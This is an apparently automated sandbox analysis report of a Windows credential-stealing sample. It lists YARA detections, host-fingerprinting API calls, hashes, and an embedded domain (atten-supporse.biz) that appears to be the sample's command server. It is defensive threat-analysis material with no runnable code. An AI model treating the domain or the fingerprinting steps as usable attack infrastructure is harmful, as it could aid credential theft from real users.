00000000.00000003.2174142658.00000000016EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2134348789.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2111788836.00000000016DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2174167356.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2134730644.00000000016DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2171451535.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	58.8%
Total number of Nodes:	228
Total number of Limit Nodes:	20

Executed Functions

Function 00EE15F0 Relevance: 28.1, Strings: 22, Instructions: 608
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

c, xrefs: 00EE1D51
/, xrefs: 00EE1A80
,, xrefs: 00EE1A71
,, xrefs: 00EE1BCF
a, xrefs: 00EE1D5B
!@, xrefs: 00EE1623
x, xrefs: 00EE1C64
/, xrefs: 00EE1A7B
c, xrefs: 00EE168A
b, xrefs: 00EE168F
`, xrefs: 00EE1AF2
=, xrefs: 00EE18E5
b, xrefs: 00EE1D56
b, xrefs: 00EE1AE8
a, xrefs: 00EE1694
?, xrefs: 00EE18EF
$, xrefs: 00EE1A76
c, xrefs: 00EE1AE3
`, xrefs: 00EE1D60
`, xrefs: 00EE1699
y, xrefs: 00EE1C69
a, xrefs: 00EE1AED

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: !@$$$,$,$/$/$=$?$`$`$`$a$a$a$b$b$b$c$c$c$x$y
API String ID: 0-2322859148
Opcode ID: e42da7a2c071a6a4162a340252f177c058308a3428154bdddf82dc6413be2495
Instruction ID: 407cb7651ae095168bf38bc3b48668b6113ca84279dadd8763d21c1ce520082c
Opcode Fuzzy Hash: e42da7a2c071a6a4162a340252f177c058308a3428154bdddf82dc6413be2495
Instruction Fuzzy Hash: 6232253160C3888FD3288B29C4953AFFBE1ABC5314F19996DE5D5D7392D6B98881CB43

Function 00EF6F90 Relevance: 25.1, APIs: 5, Strings: 9, Instructions: 579
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(D080DE8F), ref: 00EF71DC
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00EF7218
SysFreeString.OLEAUT32(?), ref: 00EF7504
SysFreeString.OLEAUT32(?), ref: 00EF750A
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00EF7552

Strings

.;, xrefs: 00EF7282
{|, xrefs: 00EF73BF
.'(), xrefs: 00EF7008, 00EF70C1
>C, xrefs: 00EF70D7
C, xrefs: 00EF70CF
{.] , xrefs: 00EF71A1
p*v,, xrefs: 00EF7199
!", xrefs: 00EF71A9
"#$%, xrefs: 00EF75FC

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID: String$Free$AllocBlanketInformationProxyVolume
String ID: !"$"#$%$.'()$.;$>C$C$p*v,${.] ${|
API String ID: 1773362589-264043890
Opcode ID: 1f77be2668863aa7c420b503f6b483c67ba704ae5373f45a4c896d0859a5268f
Instruction ID: 2a3988f697373c69fd05e0b4d13e193d7581bfecbd39a0e4b17b963bf77e4838
Opcode Fuzzy Hash: 1f77be2668863aa7c420b503f6b483c67ba704ae5373f45a4c896d0859a5268f
Instruction Fuzzy Hash: 1902EE7160C3049FD310CF64CC81BABBBE5EB85308F14992CE6D5AB2A1E779D845CB92

Function 00ECE2A9 Relevance: 12.5, APIs: 1, Strings: 7, Instructions: 531
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 00ECE673

Strings

I~, xrefs: 00ECE8E3
s, xrefs: 00ECE736
,, xrefs: 00ECE688
`~, xrefs: 00ECE8CD
qx, xrefs: 00ECE8EE
atten-supporse.biz, xrefs: 00ECE649, 00ECE9DD
"# `, xrefs: 00ECE70A

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID: Uninitialize
String ID: "# `$,$I~$`~$atten-supporse.biz$qx$s
API String ID: 3861434553-3378010734
Opcode ID: 34f86ecda3d1610e64e18b268fd9ad20ab4a1f16e2e1a4a2a2e30ae900f4bdad
Instruction ID: 3dbc17b4fed414fbeadeba6e0c45050caec5072462170fb3855bc8c2627cf3ce
Opcode Fuzzy Hash: 34f86ecda3d1610e64e18b268fd9ad20ab4a1f16e2e1a4a2a2e30ae900f4bdad
Instruction Fuzzy Hash: 5A02C1B010C3D18BD775CF2585A07EBBFE1AF92304F1899ACD4DA5B252D676040A9B63

Function 00ECA960 Relevance: 9.2, Strings: 7, Instructions: 401
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

kl, xrefs: 00ECAB2D
n, xrefs: 00ECA982
#xDz, xrefs: 00ECAACE
N[\D, xrefs: 00ECABA4, 00ECADB7, 00ECABC5, 00ECACD2, 00ECADC0, 00ECADEE, 00ECAD01, 00ECACF6
A|}~, xrefs: 00ECAAD6
N[\D, xrefs: 00ECAC00
'D F, xrefs: 00ECAAC6

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: #xDz$'D F$A|}~$N[\D$N[\D$kl$n
API String ID: 0-490458541
Opcode ID: 3c5ae1ecc503dad3f19430b7d51b5b90d6e990d35e48ded845e4400fead21d29
Instruction ID: 42db32956771872b4c7caa2987f24b209e568a44024bb81c6756488723818ff7
Opcode Fuzzy Hash: 3c5ae1ecc503dad3f19430b7d51b5b90d6e990d35e48ded845e4400fead21d29
Instruction Fuzzy Hash: 21C1F7726083544BC714CF648990AABFBD3ABC130CF1D997CE5D66B342D676990AC783

Function 00ECCE55 Relevance: 9.0, Strings: 7, Instructions: 275
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

VgfW, xrefs: 00ECCF2F
F^, xrefs: 00ECD0B9
I@, xrefs: 00ECD0C4
z@(, xrefs: 00ECCF5B
N~ :, xrefs: 00ECCF45
atten-supporse.biz, xrefs: 00ECD27A
42BCA40E06D6DEFC23D904AF30EFEBBC, xrefs: 00ECCEAF

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: 42BCA40E06D6DEFC23D904AF30EFEBBC$F^$I@$N~ :$VgfW$atten-supporse.biz$z@(
API String ID: 0-2302198242
Opcode ID: a5a41acf5f803c853ee2cf37fe5f96fc6bd4d0657cc74780324da553a7f2c310
Instruction ID: ba0cc714f660ce82d4a11de64cf3188ed622ebafde06e8297bb169d0c817ef8d
Opcode Fuzzy Hash: a5a41acf5f803c853ee2cf37fe5f96fc6bd4d0657cc74780324da553a7f2c310
Instruction Fuzzy Hash: 3791E0B010D3C18BD335CF25D991BEBBBE0AB96314F148D6CC4D99B242D739454ADB92

Function 00EE33A0 Relevance: 8.0, Strings: 6, Instructions: 472
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^<P, xrefs: 00EE363F
]~"p, xrefs: 00EE367F
ij, xrefs: 00EE397D
VW, xrefs: 00EE33E5
KM, xrefs: 00EE37FB
#R,T, xrefs: 00EE3647

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: #R,T$$^<P$VW$]~"p$ij$KM
API String ID: 0-788320361
Opcode ID: ccc6d2a2492521e9c332d9c5b866c006e020194a506c148175cd01318d87f7b6
Instruction ID: b12a462da70918ebe4a417b23d4af68433a19b2a967da5e1ae137f911e3bb71c
Opcode Fuzzy Hash: ccc6d2a2492521e9c332d9c5b866c006e020194a506c148175cd01318d87f7b6
Instruction Fuzzy Hash: 65F1EBB06083848FD314DF66D88262BBBE1FF95304F44992CE5959B351E779DA0ACB43

Function 00EEBFDA Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 461
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 00EEC0D7
GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 00EEC113
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 00EEC1D8

Strings

x, xrefs: 00EEC2F2

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID: ComputerName$FreeLibrary
String ID: x
API String ID: 2243422189-2363233923
Opcode ID: de5eaa6b123229c1a2f6f0d7909a81164cc4252fc52f2e0c2affa7609f846104
Instruction ID: e6059bcd3eb4a904d3a3c229b12a316cf349bc588e8d432f22416a9261e6f304
Opcode Fuzzy Hash: de5eaa6b123229c1a2f6f0d7909a81164cc4252fc52f2e0c2affa7609f846104
Instruction Fuzzy Hash: E8D1F66060C7D08EDB358B2584503BBBFE1AFD7348F2859ACD1D99B282D779490ACB53

Function 00EF6C40 Relevance: 6.5, Strings: 5, Instructions: 265
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

cba`cba`, xrefs: 00EF6DDF
a, xrefs: 00EF6ED4
c, xrefs: 00EF6ECC
b, xrefs: 00EF6ED0
`, xrefs: 00EF6ED8

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: `$a$b$c$cba`cba`
API String ID: 0-3925122358
Opcode ID: ff9ffe6dde1c2884643607283e6ad35eedba057f58c64b707dabba01c80e236c
Instruction ID: 4fd32cae8986c719d317308ebfca894a9fa8417604622b85b48ba89866493d8e
Opcode Fuzzy Hash: ff9ffe6dde1c2884643607283e6ad35eedba057f58c64b707dabba01c80e236c
Instruction Fuzzy Hash: E1A11672B083588FDB04CFA8C5513FEBBF2AB95304F19846DD586B7392D67A8940CB91

Function 00ECC36E Relevance: 6.5, Strings: 5, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CJ, xrefs: 00ECC67E
GS, xrefs: 00ECC677
4cde, xrefs: 00ECC79C
F'k), xrefs: 00ECC706
){+}, xrefs: 00ECC788

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: ){+}$4cde$CJ$F'k)$GS
API String ID: 0-4192230409
Opcode ID: 9edbd09fdaae4ec5fc7b797d88a8bb8e0bc50437c807a00b1f3e6081891b0217
Instruction ID: e2eb3a3a7f29fd768a5cca7c7c1ab7b741f0132ce011506356defa351d6b93b0
Opcode Fuzzy Hash: 9edbd09fdaae4ec5fc7b797d88a8bb8e0bc50437c807a00b1f3e6081891b0217
Instruction Fuzzy Hash: 24B11BB84053058FE354DF628688FAA7BB0FB25314F1A82E9E1892F732D7748405CF96

Function 00EEC6D7 Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 614
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

iJ, xrefs: 00EECAF5
', xrefs: 00EECC09

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: '$iJ
API String ID: 0-30662343
Opcode ID: 99fbc2c288db6a0f40cede89335d6a0bc598360ddead1e55dfa20e55aa655385
Instruction ID: 2e379f157612e5b5ca808e867155dfe33a0a29c8fcd9c257499db5071544aa72
Opcode Fuzzy Hash: 99fbc2c288db6a0f40cede89335d6a0bc598360ddead1e55dfa20e55aa655385
Instruction Fuzzy Hash: BC02F37050C3D58FD729CF2980603ABBFE1AF97308F28596DE4D9A7282D77984068B57

Function 00EEBFD3 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 456
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 00EEC113
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 00EEC1D8

Strings

x, xrefs: 00EEC2F2

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID: ComputerName
String ID: x
API String ID: 3545744682-2363233923
Opcode ID: be13fbd14f744809ed3384779912e878eab6acafcb93997defca046c69f61f07
Instruction ID: d3c53c06b6ebd1f586d15462165c376ed41f87a01785870df575f1feac31799b
Opcode Fuzzy Hash: be13fbd14f744809ed3384779912e878eab6acafcb93997defca046c69f61f07
Instruction Fuzzy Hash: 06D1176060C7D58EDB398B2984903BBBBD1AFD7344F2899ADC0D95B282D735880AC753

Function 00EC97B0 Relevance: 5.4, Strings: 4, Instructions: 396
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

w, xrefs: 00EC995C
_P, xrefs: 00EC9C05
42BCA40E06D6DEFC23D904AF30EFEBBC, xrefs: 00EC987B
EIFT, xrefs: 00EC9875, 00EC9880, 00EC98C1

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
